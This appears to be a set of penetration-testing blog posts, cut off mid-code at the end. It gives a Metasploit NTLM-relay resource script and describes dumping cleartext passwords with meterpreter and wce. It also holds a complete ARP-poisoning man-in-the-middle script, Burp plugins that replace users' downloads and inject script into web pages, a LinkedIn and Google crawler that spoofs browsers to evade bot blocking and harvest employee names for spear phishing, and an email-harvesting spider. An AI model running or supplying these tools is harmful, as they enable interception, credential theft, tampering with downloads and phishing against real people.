This can be super simple. Here’s an example that tries to execute calc.exe. It’s flaky on 2008 R2 because Windows tries to start calc as a service… but it still pretty much works if you refresh a few times.

#This simple resource simply executes calculator

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE SMB_PWN
set RPORT 445
set RURIPATH %SystemRoot%\\system32\\calc.exe
set URIPATH smb_pwn
run

MUCH more reliable is to create a service that has at least OnStart and OnStop methods. This next video has three requests: one to upload a malicious binary with SMB_PUT, a second call to SMB_PWN, and a third to remove the binary. This is similar to what the current Metasploit smb_relay and psexec modules do automatically. Here I upload a meterpreter service binary that connects back to my stage 2, and then execute a packed wce to dump the user’s password in cleartext.

This is my favorite demo, because it shows the user’s cleartext passwords from just visiting a website or viewing an email.

Conclusions

So like I mentioned before, I have a tool arsenal thing next week at Blackhat, so it would be cool if people stopped by to chat. Also, at the time of this writing this hasn’t made it into Metasploit proper yet, but I hope it makes it eventually! Egypt gave me a bunch of good fixes to do. I’ve made most of the changes, I just haven’t committed them yet (but I probably will tomorrow, barring earthquakes and whatnot).

Mitigations are a subject I don’t cover here. I think this deserves a post of its own, since misconceptions about relaying are so prevalent. Until then, this might be a good starting point: http://technet.microsoft.com/en-us/security/advisory/973811.

Some Practical ARP Poisoning with Scapy, IPTables, and Burp

ARP poisoning is a very old attack that you can use to get in the middle. A traditional focus of attacks like these is to gather information (whether that information is passwords, auth cookies, CSRF tokens, whatever) and there are sometimes ways to pull this off even against SSL sites (like SSL downgrades and funny domain names). One area I don’t think gets quite as much attention is using man in the middle as an active attack against flaws in various applications. Most of the information is available online, but the examples I’ve seen tend to be piecemeal and incomplete.

Getting an HTTP proxy in the Middle

In this example I’m going to use Backtrack, scapy, and Burp. While there are a lot of cool tools that implement ARP poisoning, like Ettercap and Cain & Abel, it’s straightforward to write your own that’s more precise and makes it easier to see what’s going on.

Here’s a quick (Linux-only) script that does two things: 1) it sets up iptables to forward all traffic except destination ports 80 and 443, which it redirects locally; 2) at a given frequency, it sends ARP packets to a victim that tell the victim to treat us as the gateway IP.

The code is hopefully straightforward. Usage might be: python mitm.py --victim=192.168.1.14

from scapy.all import *
import time
import argparse
import os
import sys


def arpPoison(args):
  conf.iface= args.iface
  pkt = ARP()
  pkt.psrc = args.router
  pkt.pdst = args.victim
  try:
    while 1:
      send(pkt, verbose=args.verbose)
      time.sleep(args.freq)
  except KeyboardInterrupt:
    pass  

#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
  data = os.popen("/sbin/route -n ").readlines()
  for line in data:
    if line.startswith("0.0.0.0") and (args.iface in line):
      print "Setting route to the default: " + line.split()[1]
      args.router = line.split()[1]
      return
  print "Error: unable to find default route" 
  sys.exit(0)

#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
  data = os.popen("/sbin/ifconfig " + args.iface).readlines()
  for line in data:
    if line.strip().startswith("inet addr"):
      args.proxy = line.split(":")[1].split()[0]
      print "setting proxy to: " + args.proxy
      return
  print "Error: unable to find default IP" 
  sys.exit(0)

def fwconf(args):
  #write appropriate kernel config settings
  f = open("/proc/sys/net/ipv4/ip_forward", "w")
  f.write('1')
  f.close()
  f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w")
  f.write('0')
  f.close()

  #iptables stuff
  os.system("/sbin/iptables --flush")
  os.system("/sbin/iptables -t nat --flush")
  os.system("/sbin/iptables --zero")
  os.system("/sbin/iptables -A FORWARD --in-interface " +  args.iface + " -j ACCEPT")
  os.system("/sbin/iptables -t nat --append POSTROUTING --out-interface " + args.iface + " -j MASQUERADE")
  #forward 80,443 to our proxy
  for port in args.ports.split(","):
    os.system("/sbin/iptables -t nat -A PREROUTING -p tcp --dport " + port + " --jump DNAT --to-destination " + args.proxy)

parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help="victim IP")
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall")
parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in seconds")
parser.add_argument('--ports', default="80,443", help="comma separated list of ports to forward to proxy")
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)

args = parser.parse_args()

#set default args
if args.router == None:
  getDefRoute(args)
if args.proxy == None:
  getDefIP(args)

#do iptables rules
if args.fwconf:
  fwconf(args)

arpPoison(args)

You can see some of what’s happening by dumping the arp tables on the victim machine. In my case, 192.168.1.1 is the gateway I’m spoofing.

After the script is run against the victim, the ARP table is changed to the attacker-controlled ‘proxy’ value (by default the attacker machine). In this example it’s easy to see the legitimate gateway at 00:25:9c:4d:b3:cc has been replaced with our attacker machine at 00:0c:29:8c:c1:d8.

At this point all traffic routes through us, and our iptables is configured to send ports 80 and 443 to our ‘proxy’. Your proxy should be configured to listen on all interfaces and set to “invisible” mode.

You should be able to see HTTP and HTTPS traffic from the victim routing through Burp. All other traffic (e.g. DNS) should pass through unmodified. Obviously, the ports that are forwarded and whatnot can be pretty easily configured, but this post is focusing on web attacks.

The next few sections of this post are some attacks that can be useful.

Replacing an HTTP Download

It’s very common, even for some of the best security organizations in the world, to allow downloads over HTTP (even in the somewhat rare case that the rest of their site is over HTTPS). You don’t have to look very far to find applications that can be downloaded without encryption, and in fact Firefox was the first place I looked. Here’s a stupid example where I use a Burp plugin to detect when a user tries to download Firefox, and then I replace it with Chrome’s setup. I’m not trying to point out any problems with Mozilla – 99% of the internet’s executables seem to be downloaded over HTTP.

The Burp plugin uses https://github.com/mwielgoszewski/jython-burp-api, which seems pretty cool. This was my first chance to use it.

from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements

class ExamplePlugin(Component):

    implements(IProxyRequestHandler)

    def processRequest(self, request):
        if "Firefox%20Setup%20" in request.url.geturl() and ".exe" in request.url.geturl():
            print "Firefox download detected, redirecting"
            request.host = "131.107.39.100"
            request.raw = ("GET /downloads/Firefox%20Setup%2013.0.1.exe HTTP/1.1\r\n" +
                "HOST: 131.107.39.100\r\n\r\n")


Clientside Attacks

Clientside attacks in the middle can be super interesting, and they include a lot of scenarios that aren’t always possible otherwise. Here’s a non-comprehensive list that comes to mind:

  • XSS in any HTTP site, and sometimes interaction with HTTPS sites if cookies aren’t secure
  • Cookie forcing is possible. E.g. if a CSRF protection compares a post parameter to a cookie then you can set the cookie and perform the CSRF, even if the site is HTTPS only. We talk about this in our CCC talk.
  • Forced NTLM relaying with most domain networks.
  • If XSS is already possible, you can force a victim to make these requests without convincing them to click on a link. This could be useful in targeted internal attacks, like these, that could get shells.

Using the same techniques as above, we can write dirty Burp plugins that insert JavaScript into HTTP responses.

    def processResponse(self, request):
        #very sloppy way to inject only once, forcing an exception on the first call
        try:
            self.attack += 1
        except:
            script = "<script>alert(document.domain)</script>"
            #simply inject into the first </head> we see
            if "</head>" in request.response.raw:
                print "Beginning Injection..."
                print type(request.response.raw)
                request.response.raw = request.response.raw.replace("</head>", script + "</head>", 1)
                self.attack = 1


Conclusions

Blah. Blah. Use HTTPS and expensive switches or static ports. Blah. Does this solve the problem, really? Blah. Blah.

I do have a reason for working on this. Can you pwn the corporate network just using ARP poisoning? NTLM relay attacks are freaking deadly, and I’ll be talking about them over the next few weeks, once at work and then at Blackhat as a tool arsenal demo. Man in the middle attacks like these offer a great/nasty way to target that operations guy and get code execution. More on this later.

Linkedin Crawler

The following is also source used in the grad project. I’ll post the actual paper at some point, but here is the LinkedIn crawler portion with the applicable source. By its nature, this code is breakable and may not work even at the time of posting. But it did work long enough for me to gather addresses, which was the point.

Usage is/was

LinkedinPageGatherer.py Linkedinusername Linkedinpassword

Following is an excerpt from the ‘paper’.

The HTMLParser libraries are more resilient to changes in source. Both the HTMLParser and lxml libraries have code available to process broken HTML. The HTMLParser libraries were chosen as more appropriate for these problems [lxml][htmlparsing].

There has been an effort to put all HTML-specific logic in debuggable places, so that if the generated HTML changes it is easy to modify the parsing code to reflect those changes (assuming equivalent information is still available). However, changes in source are frequent, and the source code has had to be modified roughly every 3 months to reflect changes in HTML layout.

Unfortunately, although the functionality is simple, this program has grown to be much more complex due to roadblocks put in place by both LinkedIn and Google.

To search LinkedIn from itself, it is necessary to have a LinkedIn account. With an account, it is possible to search with or without connections, although the search criteria differ depending on the type of account you have. Because of this, one of the requirements for searching LinkedIn is cookie management, which has to be written to keep track of the HTTP session. In addition, LinkedIn uses a POST nonce parameter on each page that must be retrieved and POSTed with every page submission. Because of the nonce, it is also necessary to log in at the login page, save the nonce and the cookie, and proceed to search through the same path an actual user would.
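That session-handling pattern looks roughly like the following sketch (this is not the crawler’s actual code – the URLs and form field names here are hypothetical placeholders):

#!/usr/bin/python
# sketch of the cookie + nonce login pattern described above
import urllib
import urllib2
import cookielib
import re

# a cookie jar so the session cookie survives across requests
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

# fetch the login page and pull out the hidden nonce field
# (URL and field names are placeholders, not LinkedIn's real ones)
login_page = opener.open("https://www.example.com/login").read()
nonce = re.search('name="csrf_nonce" value="([^"]+)"', login_page).group(1)

# POST credentials plus the nonce; the cookie jar is updated automatically
params = urllib.urlencode({"user": "me", "pass": "secret", "csrf_nonce": nonce})
opener.open("https://www.example.com/login-submit", params)

# subsequent searches reuse the same opener (cookies plus whatever nonce each page hands back)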

Once the tool is able to search for companies, there is an additional limitation. With the free account, the search is limited to displaying only 100 connections. This is inconvenient as the desired number of actual connections is often much larger. The tool I’ve written takes various criteria (such as location, title, etc) to perform multiple more specific searches of 100 results each. The extra information is harvested at each search to use for later searches. With more specific searches, the tool inserts unique items into a list of users. When the initial search initiates, LinkedIn reports the total number of results (although it only lets the account view 100 at a time) so the tool uses this total number as one possible stopping condition – when a percentage of that number has been reached or a certain number of failed searches have been tried.

This is easier to illustrate with an example. In the case of FPL, there are over 2000 results. However, it can be asserted that at least one of the results is from a certain Miami address. Using this as a search restriction the total results may be reduced to 500, the first 100 of which can be inserted. It can also be asserted that there is at least one result from the Miami address who is a project manager. Using this restriction, there are only 5 results, which have different criteria to do advanced searches on. Using this iterative approach, it is possible to gather most of the 2000. In the program I have written, this functionality is still experimental and the parameters must be adjusted.
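In rough pseudocode, that narrowing loop looks something like this (the search/filter helpers are hypothetical names, not functions from the program itself):

#!/usr/bin/python
# sketch of the iterative narrowing idea; the helper functions are hypothetical
def gather(company, total_results, totalresultpercent=0.7, maxskunk=100):
    people = set()
    skunked = 0
    while len(people) < totalresultpercent * total_results and skunked < maxskunk:
        criteria = next_restriction(people)           # e.g. add a location or title restriction
        results = search_linkedin(company, criteria)  # each search shows at most 100 results
        new = set(results) - people
        if not new:
            skunked += 1                              # a search that found nothing new
        people |= new
    return people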

One additional difficulty with LinkedIn is that with these results it does not display a name, only a job title associated with the company. Obviously, this is not ideal. A name is necessary for even the most basic spear phishing attacks. An email may sound slightly awkward if addressed as “Dear Project Manager in the Cyber Security Group”. The solution I found to retrieve employee names is to use Google. Using specific Google queries based on the LinkedIn names, it is possible to retrieve the names associated with a job, company, and job title.

Google has a use policy prohibiting automated crawlers. Because of this policy, it does various checks on the queries to verify that the browser is a known real browser. If it is not, Google returns a 403 status stating that the browser is not known. To circumvent this, a packet dump was performed on a valid browser. The code now has a snippet to send information exactly like an actual browser would along with randomized time delays to mimic a person. It should be impossible for Google to tell the difference over the long run – whatever checks they do can be mimicked. The code includes several configurable browsers to masquerade as. Below is the code snippet including the default spoofed browser which is Firefox running on Linux.

def getHeaders(self, browser="ubuntuFF"):
  #ubuntu firefox spoof
  if browser == "ubuntuFF":
    headers = {
      "Host": "www.google.com",
      "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
      "Accept" : "text/html,application/xhtml+xml,application xml;q=0.9,*/*;q=0.8",
      "Accept-Language" : "en-us,en;q=0.5",
      "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
      "Keep-Alive" : "300",
      "Proxy-Connection" : "keep-alive"
    }
...

Although both Google and LinkedIn make it difficult to automate information mining, their approach will fundamentally fail a motivated adversary. Because these companies want to make information available to users, this information can also be retrieved automatically. Captcha technology has been one traditional solution, though by its nature it suffers from similar flaws in design.

The LinkedIn crawler program demonstrates the possibility of an attacker targeting a company to harvest people’s names, which many times can be mapped to email addresses as demonstrated in previous sections.

GoogleQueery.py

#! /usr/bin/python

#class to make google queries
#must masquerade as a legitimate browser
#Using this violates Google ToS

import httplib
import urllib
import sys
import HTMLParser
import re

#class is basically fed a google url for linkedin for the
#sole purpose of getting a linkedin link
class GoogleQueery(HTMLParser.HTMLParser):
  def __init__(self, goog_url):
    HTMLParser.HTMLParser.__init__(self)
    self.linkedinurl = []
    query = urllib.urlencode({"q": goog_url})
    conn = httplib.HTTPConnection("www.google.com")
    headers = self.getHeaders()
    conn.request("GET", "/search?hl=en&"+query, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    self.feed(data)
    self.get_num_results(data)
    conn.close()

  #this is necessary because google wants to be mean and 403 based on... not sure
  #but it seems  I must look like a real browser to get a 200
  def getHeaders(self, browser="chromium"):
    #if browser == "random":
      #TODO randomize choice
    #ubuntu firefox spoof
    if browser == "ubuntuFF":
      headers = {
        "Host": "www.google.com",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-us,en;q=0.5",
        "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive" : "300",
        "Proxy-Connection" : "keep-alive"
        }
    elif browser == "chromium":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Avail-Dictionary": "FcpNLYBN",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    elif browser == "ie":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    return headers

  def get_num_results(self, data):
    index = re.search("<b>1</b> - <b>[\d]+</b> of [\w]*[ ]?<b>([\d,]+)", data)
    try:
      self.numResults = int(index.group(1).replace(",", ""))
    except:
      self.numResults = 0
      if not "- did not match any documents. " in data:
        print "Warning: numresults parsing problem"
        print "setting number of results to 0"

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "a" and ((("linkedin.com/pub/" in attrs[0][1])
                    or  ("linkedin.com/in" in attrs[0][1]))
                    and ("http://" in attrs[0][1])
                    and ("search?q=cache" not in attrs[0][1])
                    and ("/dir/" not in attrs[0][1])):
        self.linkedinurl.append(attrs[0][1])
        #print self.linkedinurl
      #perhaps add a google cache option here in the future
    except IndexError:
      pass

#for testing
if __name__ == "__main__":
  #url = "site:linkedin.com "PROJECT ADMINISTRATOR at CAT INL QATAR W.L.L." "Qatar""
  m = GoogleQueery(url)

LinkedinHTMLParser.py

#! /usr/bin/python

#this should probably be put in LinkedinPageGatherer.py

import HTMLParser

from person_searchobj import person_searchobj

class LinkedinHTMLParser(HTMLParser.HTMLParser):
  """
  subclass of HTMLParser specifically for parsing Linkedin names to person_searchobjs
  requires a call to .feed(data), stored data in the personArray
  """
  def __init__(self):
    HTMLParser.HTMLParser.__init__(self)
    self.personArray = []
    self.personIndex = -1
    self.inGivenName = False
    self.inFamilyName = False
    self.inTitle = False
    self.inLocation = False

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "li" and attrs[0][0] == "class" and ("vcard" in attrs[0][1]):
        self.personIndex += 1
        self.personArray.append(person_searchobj())
      if attrs[0][1] == "given-name" and self.personIndex >=0:
        self.inGivenName = True
      elif attrs[0][1] == "family-name" and self.personIndex >= 0:
        self.inFamilyName = True
      elif tag == "dd" and attrs[0][1] == "title" and self.personIndex >= 0:
        self.inTitle = True
      elif tag == "span" and attrs[0][1] == "location" and self.personIndex >= 0:
        self.inLocation = True
    except IndexError:
      pass

  def handle_endtag(self, tag):
    if tag == "span":
      self.inGivenName = False
      self.inFamilyName = False
      self.inLocation = False
    elif tag == "dd":
      self.inTitle = False

  def handle_data(self, data):
    if self.inGivenName:
      self.personArray[self.personIndex].givenName = data.strip()
    elif self.inFamilyName:
      self.personArray[self.personIndex].familyName = data.strip()
    elif self.inTitle:
      self.personArray[self.personIndex].title = data.strip()
    elif self.inLocation:
      self.personArray[self.personIndex].location = data.strip()

#for testing - use a file since this is just a parser
if __name__ == "__main__":
  import sys
  file = open ("test.htm")
  df = file.read()
  parser = LinkedinHTMLParser()
  parser.feed(df)
  print "================"
  for person in parser.personArray:
    print person.goog_printstring()
  file.close()

LinkedinPageGatherer.py – this is what should be called directly.

#!/usr/bin/python

import urllib
import urllib2
import sys
import time
import copy
import pickle
import math

from person_searchobj import person_searchobj
from LinkedinHTMLParser import LinkedinHTMLParser
from GoogleQueery import GoogleQueery

#TODO add a test function that tests the website format for easy diagnostics when HTML changes
#TODO use HTMLParser like a sane person
class LinkedinPageGatherer:
  """
  class that generates the initial linkedin queries using the company name
  as a search parameter. These search strings are then run through google
  to obtain additional information (the limited initial search strings usually
  lack vital info like names)
  """
  def __init__(self, companyName, login, password, maxsearch=100,
               totalresultpercent=.7, maxskunk=100):
    """
    login and password are params for a valid linkedin account
    maxsearch is the number of results - linkedin limits unpaid accounts to 100
    totalresultpercent is the fraction of the total results this script will try to find
    maxskunk is the number of searches that add no new people before giving up
    """
    #list of person_searchobj
    self.people_searchobj = []
    self.companyName = companyName
    self.login = login
    self.password = password
    self.fullurl = ("http://www.linkedin.com/search?search=&company="+companyName+
                    "&currentCompany=currentCompany", "&page_num=", "0")
    self.opener = self.linkedin_login()
    #for the smart_people_adder
    self.searchSpecific = []
    #can only look at 100 people at a time. Parameters used to narrow down queries
    self.total_results = self.get_num_results()
    self.maxsearch = maxsearch
    self.totalresultpercent = totalresultpercent
    #self.extraparameters = {"locationinfo" : [], "titleinfo" : [], "locationtitle" : [] }
    #extraparameters is a simple stack that adds keywords to restrict the search
    self.extraparameters = []
    #TODO can only look at 100 people at a time - like to narrow down queries
    #and auto grab more
    currrespercent = 0.0
    skunked = 0
    currurl = self.fullurl[0] + self.fullurl[1]
    extraparamindex = 0

    while currrespercent < self.totalresultpercent and skunked <= maxskunk:
      numresults = self.get_num_results(currurl)
      save_num = len(self.people_searchobj)

      print "-------"
      print "currurl", currurl
      print "percentage", currrespercent
      print "skunked", skunked
      print "numresults", numresults
      print "save_num", save_num

      for i in range (0, int(min(math.ceil(self.maxsearch/10), math.ceil(numresults/10)))):
        #function adds to self.people_searchobj
        print "currurl" + currurl + str(i)
        self.return_people_links(currurl + str(i))
      currrespercent = float(len(self.people_searchobj))/self.total_results
      if save_num == len(self.people_searchobj):
        skunked += 1
      for i in self.people_searchobj:
        pushTitles = [("title", gName) for gName in i.givenName.split()]
        #TODO this could be improved for more detailed results, etc, but keeping it simple for now
        pushKeywords = [("keywords", gName) for gName in i.givenName.split()]
        pushTotal = pushTitles[:] + pushKeywords[:]
        #append to extraparameters if unique
        self.push_search_parameters(pushTotal)
      print "parameters", self.extraparameters
      #get a new url to search for, if necessary
      #use the extra params in title, "keywords" parameters
      try:
        refineel = self.extraparameters[extraparamindex]
        extraparamindex += 1
        currurl = self.fullurl[0] + "&" + refineel[0] + "=" + refineel[1] + self.fullurl[1]
      except IndexError:
        break

  """
  #TODO: This idea is fine, but we should get names first to better distinguish people
  #also maybe should be moved
  def smart_people_adder(self):
    #we've already done a basic search, must do more
    if "basic" in self.searchSpecific:
  """
  def return_people_links(self, linkedinurl):
    req = urllib2.Request(linkedinurl)
    fd = self.opener.open(req)
    pagedata = ""
    while 1:
      data = fd.read(2056)
      pagedata = pagedata + data
      if not len(data):
        break
    #print pagedata
    self.parse_page(pagedata)

  def parse_page(self, page):
    thesePeople = LinkedinHTMLParser()
    thesePeople.feed(page)
    for newperson in thesePeople.personArray:
      unique = True
      for oldperson in self.people_searchobj:
        #if all these things match but they really are different people, they
        #will likely still be found as unique google results
        if (oldperson.givenName == newperson.givenName and
            oldperson.familyName == newperson.familyName and
            oldperson.title == newperson.title and
            oldperson.location == newperson.location):
              unique = False
              break
      if unique:
        self.people_searchobj.append(newperson)
  """
    print "======================="
    for person in self.people_searchobj:
      print person.goog_printstring()
  """

  #return the number of results, very breakable
  def get_num_results(self, url=None):
    #by default return total in company
    if url == None:
      fd = self.opener.open(self.fullurl[0] + "1")
    else:
      fd = self.opener.open(url)
    data = fd.read()
    fd.close()
    searchstr = "<p class="summary">"
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find("</strong>", sindex)
    return(int(data[sindex:eindex].strip().strip("<strong>").replace(",", "").strip()))

  #returns an opener object that contains valid cookies
  def linkedin_login(self):
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    urllib2.install_opener(opener)
    #login page
    fd = opener.open("https://www.linkedin.com/secure/login?trk=hb_signin")
    data = fd.read()
    fd.close()
    #csrf 'prevention' login value
    searchstr = """<input type="hidden" name="csrfToken" value="ajax:"""
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find('"', sindex)
    params = urllib.urlencode(dict(csrfToken="ajax:-"+data[sindex:eindex],
                              session_key=self.login,
                              session_password=self.password,
                              session_login="Sign+In",
                              session_rikey=""))
    #need the second request to get the csrf stuff, initial cookies
    request = urllib2.Request("https://www.linkedin.com/secure/login")
    request.add_header("Host", "www.linkedin.com")
    request.add_header("Referer", "https://www.linkedin.com/secure/login?trk=hb_signin")
    time.sleep(1.5)
    fd = opener.open(request, params)
    data = fd.read()
    if "<div id="header" class="guest">" in data:
      print "Linkedin authentication faild. Please supply a valid linkedin account"
      sys.exit(1)
    else:
      print "Linkedin authentication Successful"
    fd.close()
    return opener

  def push_search_parameters(self, extraparam):
    uselesswords = [ "for", "the", "and", "at", "in"]
    for pm in extraparam:
      pm = (pm[0], pm[1].strip().lower())
      if (pm not in self.extraparameters) and (pm[1] not in uselesswords) and pm != None:
        self.extraparameters.append(pm)

class LinkedinTotalPageGather(LinkedinPageGatherer):
  """
  Overhead class that generates the person_searchobjs, using GoogleQueery
  """
  def __init__(self, companyName, login, password):
    LinkedinPageGatherer.__init__(self, companyName, login, password)
    extraPeople = []
    for person in self.people_searchobj:
      mgoogqueery = GoogleQueery(person.goog_printstring())
      #making the assumption that each pub url is a unique person
      count = 0
      for url in mgoogqueery.linkedinurl:
        #grab the real name from the url
        begindex = url.find("/pub/") + 5
        endindex = url.find("/", begindex)
        if count == 0:
          person.url = url
          person.name = url[begindex:endindex]
        else:
          extraObj = copy.deepcopy(person)
          extraObj.url = url
          extraObj.name = url[begindex:endindex]
          extraPeople.append(extraObj)
        count += 1
      print person
    print "Extra People"
    for person in extraPeople:
      print person
      self.people_searchobj.append(person)

if __name__ == "__main__":
  #args are company name, linkedin email, and linkedin password
  my = LinkedinTotalPageGather(sys.argv[1], sys.argv[2], sys.argv[3])
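If you would rather drive it from another script than from the command line, a minimal sketch (the company name and credentials are placeholders) might look like:

#programmatic use - company name and credentials below are placeholders
gatherer = LinkedinTotalPageGather("Example Corp", "you@example.com", "hunter2")
for person in gatherer.people_searchobj:
  print person.goog_printstring()
  print person.url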

person_searchobj.py

#! /usr/bin/python

class person_searchobj():
  """this object is used for the google search and the final person object"""

  def __init__ (self, givenname="", familyname="", title="", organization="", location=""):
    """
    given name could be a title in this case, does not matter in terms of google
    but then may have to change for the final person object
    """
    #"name" is their actual name, unlike givenName and family name which are linkedin names
    self.name = ""
    self.givenName = givenname
    self.familyName = familyname
    self.title = title
    self.organization = organization
    self.location = location

    #this is retrieved by GoogleQueery
    self.url = ""

  def goog_printstring(self):
    """return the google print string used for queries"""
    retrstr = "site:linkedin.com "
    for i in  [self.givenName, self.familyName, self.title, self.organization, self.location]:
      if i != "":
        retrstr += '"' + i +'" '
    return retrstr

  def __repr__(self):
    """Overload __repr__ for easy printing. Mostly for debugging"""
    return (self.name + "\n" +
            "------\n"
            "GivenName: " + self.givenName + "\n" +
            "familyName:" + self.familyName + "\n" +
            "Title:" + self.title + "\n" +
            "Organization:" + self.organization + "\n" +
            "Location:" + self.location + "\n" +
            "URL:" + self.url + "\n\n")

email_spider

This was a small part of a larger project that itself made up about a third of my graduate project. I used it to collect certain information. Here is the relevant excerpt from the paper.

Website Email Spider Program

In order to automatically process publicly available email addresses, a simple tool was developed, with source code available in Appendix A. An automated tool is able to process web pages in a way that is less error prone than manual methods, and it also makes processing the sheer number of websites possible (or at least less tedious).
This tool begins at a few root pages, which can be comma delimited. From these, it searches for all unique links by keeping track of a queue so that pages are not usually revisited (although revisiting a page is still possible in case the server is case insensitive or equivalent pages are dynamically generated with unique URLs). In addition, the base class is passed a website scope so that pages outside of that scope are not spidered. By default, the scope is simply a regular expression including the top domain name of the organization.

Each page requested searches the contents for the following regular expression to identify common email formats:

[\w_.-]{3,}@[\w_.-]{6,}

The 3 and 6 repeaters were necessary because of false positives otherwise obtained due to various encodings. This regular expression will not obtain all email addresses. However, it will obtain the most common addresses with a minimum of false positives. In addition, the obtained email addresses are run against a blacklist of uninteresting generic form addresses (such as help@example.com, info@example.com, or sales@example.com).
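As a quick sanity check (this snippet is mine, not part of the tool), the expression and the blacklist idea behave roughly like this:

#demonstration of the email regex plus a blacklist applied to the local part
import re
emailre = re.compile(r"[\w_.-]{3,}@[\w_.-]{6,}")
sample = 'mail <a href="mailto:jsmith@example.com">jsmith@example.com</a> or info@example.com'
blacklist = ["help", "info", "sales"]
for addr in set(re.findall(emailre, sample)):
  if addr.split("@")[0] not in blacklist:
    print addr   #only jsmith@example.com survives the filter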

These email addresses are saved in memory and reported when the program completes or is interrupted. Note that because of the dynamic nature of some pages, the spider can potentially run indefinitely and must be interrupted (for example, a calendar application that uses links to go back in time indefinitely). Most emails seemed to be obtained in the first 1,000 pages crawled, and a limit of 10,000 pages was chosen as a reasonable scope. Although this limit was reached several times, the spider uses a breadth-first search, and it was observed that most unique addresses were obtained early in the spidering process; extending the number of pages tended to have diminishing returns. Despite this, websites with more pages also tended to correlate with more email addresses returned (see analysis section).

Much of the logic in the spidering tool is dedicated to correctly parsing HTML. By their nature, web pages vary widely in how they express links, with many sites using a mix of directory traversal, absolute URLs, and partial URLs. It is no surprise there are so many security vulnerabilities related to browsers parsing this complex data.
There is also an effort to make the software somewhat more efficient by ignoring superfluous links to objects such as documents, executables, etc. Although an exception will catch the processing error if such a file is encountered, downloading these files still consumes resources.

Using this tool is straightforward, but a certain familiarity is expected – it was not developed for an end user but for this specific experiment. For example, a root URL is best given in the format http://example.com/, since in its current state the tool derives the scope (example.com) from that URL and uses it to verify that spidered links stay within a reasonable scope. It prints debugging messages constantly because every site seemed to have unique parsing quirks. Although other formats and usages may work, there was little effort to make this software easy to use.
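Concretely, programmatic use of the SiteSpider class from the source below would look something like this (the module name email_spider and the URLs are placeholders):

#assumes the source below was saved as email_spider.py - the name is arbitrary
from email_spider import SiteSpider
#scope defaults to the host of the first root URL (example.com here)
SiteSpider(["http://example.com/"])
#several roots plus an explicit scope regex
SiteSpider(["http://example.com/", "http://www.example.com/news/"], scope="example.com")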

Here is the source.
#!/usr/bin/python

import HTMLParser
import urllib2
import re
import sys
import signal
import socket

socket.setdefaulttimeout(20)

#spider is meant for a single url
#proto can be http, https, or any
class PageSpider(HTMLParser.HTMLParser):
  def __init__(self, url, scope, searchList=[], emailList=[], errorDict={}):
    HTMLParser.HTMLParser.__init__(self)
    self.url = url
    self.scope = scope
    self.searchList = searchList
    self.emailList = emailList
    try:
      urlre = re.search(r"(\w+):[/]+([^/]+).*", self.url)
      self.baseurl = urlre.group(2)
      self.proto = urlre.group(1)
    except AttributeError:
      raise Exception("URLFormat", "URL passed is invalid")
    if self.scope == None:
      self.scope = self.baseurl
    try:
      req = urllib2.urlopen(self.url)
      htmlstuff = req.read()
    except KeyboardInterrupt:
      raise
    except urllib2.HTTPError:
      #not able to fetch a url eg 404
      errorDict["link"] += 1
      print "Warning: link error"
      return
    except urllib2.URLError:
      errorDict["link"] += 1
      print "Warning: URLError"
      return
    except ValueError:
      errorDict["link"] += 1
      print "Warning link error"
      return
    except:
      print "Unknown Error", self.url
      errorDict["link"] += 1
      return
    emailre = re.compile(r"[\w_.-]{3,}@[\w_.-]{2,}\.[\w_.-]{2,}")
    nemail = re.findall(emailre, htmlstuff)
    for i in nemail:
      if i not in self.emailList:
        self.emailList.append(i)
    try:
      self.feed(htmlstuff)
    except HTMLParser.HTMLParseError:
      errorDict["parse"] += 1
      print "Warning: HTML Parse Error"
      pass
    except UnicodeDecodeError:
      errorDict["decoding"] += 1
      print "Warning: Unicode Decode Error"
      pass
  def handle_starttag(self, tag, attrs):
    if (tag == "a" or tag =="link") and attrs:
      #process the url formats, make sure the base is in scope
      for k, v in attrs:
